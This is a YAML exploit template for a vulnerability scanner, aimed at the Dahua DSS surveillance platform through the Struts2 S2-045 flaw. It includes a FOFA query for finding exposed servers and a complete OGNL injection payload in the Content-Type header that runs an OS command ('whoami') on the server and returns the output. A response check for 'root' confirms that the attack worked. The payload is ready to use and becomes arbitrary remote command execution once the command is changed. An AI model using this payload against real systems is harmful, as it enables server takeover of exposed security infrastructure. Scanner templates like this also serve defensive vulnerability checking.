product: 大华DSS城市安防监控平台
vName: 大华DSS城市安防监控平台 Struct2-045命令执行
type: 命令执行
vID: []
level: 3
vDesc: 大华DSS城市安防监控平台存在Struct2-045命令执行漏洞，攻击者可以利用此漏洞获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="dahua-DSS"
protocol: http
link: https://blog.csdn.net/qq_37113223/article/details/136523855?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7EPaidSort-1-136523855-blog-137643460.235%5Ev43%5Epc_blog_bottom_relevance_base6&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7EPaidSort-1-136523855-blog-137643460.235%5Ev43%5Epc_blog_bottom_relevance_base6&utm_relevant_index=1
fix:
- 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
- exp:
    method: post
    follow: false
    path: /admin/login_login.action
    header:
      Content-Type: '%{(#nike=''multipart/form-data'').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[''com.opensymphony.xwork2.ActionContext.container'']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=''whoami'').(#iswin=(@java.lang.System@getProperty(''os.name'').toLowerCase().contains(''win''))).(#cmds=(#iswin?{''cmd.exe'',''/c'',#cmd}:{''/bin/bash'',''-c'',#cmd})).(#p=new
        java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'
  verify:
    path: ''
    logic: and
    check:
    - status: 200
      body:
        value:
        - root
        logic: and
